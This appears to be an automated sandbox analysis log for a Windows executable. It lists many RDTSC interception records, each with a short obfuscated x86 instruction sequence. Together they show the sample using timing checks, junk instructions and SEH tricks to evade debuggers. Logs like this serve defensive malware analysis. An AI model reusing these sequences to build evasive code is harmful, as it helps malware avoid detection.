          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A6851 second address: 9A68A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C1442h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F1FDD1C1451h 0x00000011 jmp 00007F1FDD1C1447h 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A6CA0 second address: 9A6CA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AB1E1 second address: 9AB1E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AB1E7 second address: 9AB1EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AB1EC second address: 9AB1F1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AB872 second address: 9AB878 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AA129 second address: 9AA14B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F1FDD1C1447h 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AB9EC second address: 9AB9F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9ACC80 second address: 9ACC84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B30D7 second address: 9B30F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C120Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jc 00007F1FDD1C1206h 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B30F2 second address: 9B30F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B271E second address: 9B2722 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B2722 second address: 9B2730 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F1FDD1C1438h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B2730 second address: 9B2743 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C120Eh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B29A0 second address: 9B29AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F1FDD1C1436h 0x0000000a popad 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B29AE second address: 9B29B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B50AB second address: 9B50B5 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1FDD1C143Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B50B5 second address: 9B50C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B50C2 second address: 9B50CF instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F1FDD1C1436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B50CF second address: 9B50DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d push edx 0x0000000e pop edx 0x0000000f pop edi 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B50DF second address: 9B50E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B5508 second address: 9B551B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C120Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B570C second address: 9B5710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B5710 second address: 9B5726 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1FDD1C1206h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007F1FDD1C1206h 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B5726 second address: 9B572C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B5C0B second address: 9B5C11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B5C11 second address: 9B5C1F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B5C1F second address: 9B5C2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1FDD1C120Bh 0x00000009 popad 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B5C2F second address: 9B5C35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B5C35 second address: 9B5C39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B5CA8 second address: 9B5CBA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C143Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B5DAA second address: 9B5DCD instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F1FDD1C1216h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B68B1 second address: 9B68C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F1FDD1C1436h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B68C5 second address: 9B68C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B68C9 second address: 9B68D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B8DB9 second address: 9B8DCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 je 00007F1FDD1C1218h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B8DCA second address: 9B8DCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B8DCE second address: 9B8DD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B8DD2 second address: 9B8E2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 mov si, F7F2h 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F1FDD1C1438h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 jl 00007F1FDD1C143Ah 0x0000002d mov si, 7995h 0x00000031 push 00000000h 0x00000033 xchg eax, ebx 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 pushad 0x00000038 popad 0x00000039 jmp 00007F1FDD1C1443h 0x0000003e popad 0x0000003f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B98B5 second address: 9B98EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C1218h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F1FDD1C121Ah 0x00000012 jmp 00007F1FDD1C1214h 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B95EB second address: 9B95EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B95EF second address: 9B95F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BA2DD second address: 9BA2F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C1440h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BA2F1 second address: 9BA2F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BA2F7 second address: 9BA327 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C1446h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F1FDD1C143Dh 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BBA64 second address: 9BBA68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BBA68 second address: 9BBA76 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C143Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BFC5D second address: 9BFC65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C0DCE second address: 9C0E57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 mov dword ptr [esp], eax 0x00000009 ja 00007F1FDD1C144Ah 0x0000000f push dword ptr fs:[00000000h] 0x00000016 jmp 00007F1FDD1C1441h 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 cmc 0x00000023 mov eax, dword ptr [ebp+122D09B5h] 0x00000029 mov dword ptr [ebp+122D2733h], esi 0x0000002f jmp 00007F1FDD1C143Bh 0x00000034 push FFFFFFFFh 0x00000036 push 00000000h 0x00000038 push edi 0x00000039 call 00007F1FDD1C1438h 0x0000003e pop edi 0x0000003f mov dword ptr [esp+04h], edi 0x00000043 add dword ptr [esp+04h], 00000014h 0x0000004b inc edi 0x0000004c push edi 0x0000004d ret 0x0000004e pop edi 0x0000004f ret 0x00000050 mov dword ptr [ebp+122D1C83h], ebx 0x00000056 nop 0x00000057 push eax 0x00000058 push edx 0x00000059 jp 00007F1FDD1C1438h 0x0000005f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C1CA0 second address: 9C1CB0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jng 00007F1FDD1C120Eh 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C0E57 second address: 9C0E5C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C3A2E second address: 9C3A4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 jmp 00007F1FDD1C1210h 0x0000000c pop edx 0x0000000d pushad 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C0E5C second address: 9C0E7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1FDD1C1445h 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C0E7D second address: 9C0E87 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F1FDD1C1206h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C0E87 second address: 9C0E8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C429E second address: 9C42A4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C506E second address: 9C50EF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F1FDD1C1442h 0x0000000c jmp 00007F1FDD1C143Ch 0x00000011 popad 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007F1FDD1C1438h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 0000001Ah 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d push 00000000h 0x0000002f or bh, FFFFFFDFh 0x00000032 mov edi, 439F4220h 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push eax 0x0000003c call 00007F1FDD1C1438h 0x00000041 pop eax 0x00000042 mov dword ptr [esp+04h], eax 0x00000046 add dword ptr [esp+04h], 00000014h 0x0000004e inc eax 0x0000004f push eax 0x00000050 ret 0x00000051 pop eax 0x00000052 ret 0x00000053 or bx, B661h 0x00000058 xchg eax, esi 0x00000059 jmp 00007F1FDD1C1441h 0x0000005e push eax 0x0000005f pushad 0x00000060 push eax 0x00000061 push edx 0x00000062 pushad 0x00000063 popad 0x00000064 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C6159 second address: 9C615D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C615D second address: 9C6163 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C6163 second address: 9C619A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1FDD1C1216h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f jbe 00007F1FDD1C1208h 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F1FDD1C120Dh 0x0000001e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C710E second address: 9C713A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 pushad 0x00000009 jne 00007F1FDD1C144Fh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C713A second address: 9C713E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C72C3 second address: 9C7351 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jp 00007F1FDD1C143Eh 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F1FDD1C1438h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 mov dword ptr [ebp+1245C783h], esi 0x0000002d add ebx, dword ptr [ebp+122D3A95h] 0x00000033 push dword ptr fs:[00000000h] 0x0000003a sub dword ptr [ebp+122D2733h], ecx 0x00000040 mov ebx, dword ptr [ebp+122D32D0h] 0x00000046 mov dword ptr fs:[00000000h], esp 0x0000004d push 00000000h 0x0000004f push ebx 0x00000050 call 00007F1FDD1C1438h 0x00000055 pop ebx 0x00000056 mov dword ptr [esp+04h], ebx 0x0000005a add dword ptr [esp+04h], 00000018h 0x00000062 inc ebx 0x00000063 push ebx 0x00000064 ret 0x00000065 pop ebx 0x00000066 ret 0x00000067 mov eax, dword ptr [ebp+122D115Dh] 0x0000006d push FFFFFFFFh 0x0000006f xor dword ptr [ebp+122D333Dh], edx 0x00000075 nop 0x00000076 push eax 0x00000077 push eax 0x00000078 push edx 0x00000079 push eax 0x0000007a pop eax 0x0000007b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C83DB second address: 9C83F6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 ja 00007F1FDD1C1206h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jno 00007F1FDD1C120Ch 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C83F6 second address: 9C8497 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C1447h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov dword ptr [ebp+122D1CE5h], eax 0x00000010 push dword ptr fs:[00000000h] 0x00000017 or edi, dword ptr [ebp+122D2547h] 0x0000001d mov dword ptr [ebp+122D1DBEh], ebx 0x00000023 mov dword ptr fs:[00000000h], esp 0x0000002a push 00000000h 0x0000002c push ebp 0x0000002d call 00007F1FDD1C1438h 0x00000032 pop ebp 0x00000033 mov dword ptr [esp+04h], ebp 0x00000037 add dword ptr [esp+04h], 0000001Dh 0x0000003f inc ebp 0x00000040 push ebp 0x00000041 ret 0x00000042 pop ebp 0x00000043 ret 0x00000044 call 00007F1FDD1C1444h 0x00000049 call 00007F1FDD1C143Bh 0x0000004e jbe 00007F1FDD1C1436h 0x00000054 pop edi 0x00000055 pop edi 0x00000056 mov eax, dword ptr [ebp+122D012Dh] 0x0000005c mov edi, dword ptr [ebp+122D3A0Dh] 0x00000062 push FFFFFFFFh 0x00000064 mov dword ptr [ebp+122D333Dh], edx 0x0000006a nop 0x0000006b pushad 0x0000006c push edi 0x0000006d push eax 0x0000006e push edx 0x0000006f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CA0B9 second address: 9CA0D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1FDD1C1212h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C9380 second address: 9C9392 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F1FDD1C1438h 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CB012 second address: 9CB094 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a jns 00007F1FDD1C120Ah 0x00000010 mov ebx, dword ptr [ebp+122D2C17h] 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ebp 0x0000001b call 00007F1FDD1C1208h 0x00000020 pop ebp 0x00000021 mov dword ptr [esp+04h], ebp 0x00000025 add dword ptr [esp+04h], 00000014h 0x0000002d inc ebp 0x0000002e push ebp 0x0000002f ret 0x00000030 pop ebp 0x00000031 ret 0x00000032 mov dword ptr [ebp+122D2393h], edx 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push edi 0x0000003d call 00007F1FDD1C1208h 0x00000042 pop edi 0x00000043 mov dword ptr [esp+04h], edi 0x00000047 add dword ptr [esp+04h], 00000018h 0x0000004f inc edi 0x00000050 push edi 0x00000051 ret 0x00000052 pop edi 0x00000053 ret 0x00000054 jmp 00007F1FDD1C1218h 0x00000059 push eax 0x0000005a pushad 0x0000005b je 00007F1FDD1C120Ch 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CB094 second address: 9CB09B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C9463 second address: 9C9467 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CC094 second address: 9CC106 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F1FDD1C1436h 0x0000000a popad 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F1FDD1C1438h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 0000001Ah 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 sub ebx, 2C2C4139h 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ebx 0x00000034 call 00007F1FDD1C1438h 0x00000039 pop ebx 0x0000003a mov dword ptr [esp+04h], ebx 0x0000003e add dword ptr [esp+04h], 00000018h 0x00000046 inc ebx 0x00000047 push ebx 0x00000048 ret 0x00000049 pop ebx 0x0000004a ret 0x0000004b xor bx, C5E5h 0x00000050 push 00000000h 0x00000052 mov di, dx 0x00000055 xchg eax, esi 0x00000056 push eax 0x00000057 push edx 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007F1FDD1C143Ah 0x0000005f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CC106 second address: 9CC10C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CC10C second address: 9CC136 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C143Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007F1FDD1C1446h 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CD189 second address: 9CD18D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE110 second address: 9CE11A instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1FDD1C143Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE11A second address: 9CE169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 mov dword ptr [ebp+122D3432h], eax 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007F1FDD1C1208h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b sbb di, BD3Ah 0x00000030 push 00000000h 0x00000032 jnc 00007F1FDD1C120Ch 0x00000038 mov ebx, dword ptr [ebp+122D39C5h] 0x0000003e xchg eax, esi 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE169 second address: 9CE16D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
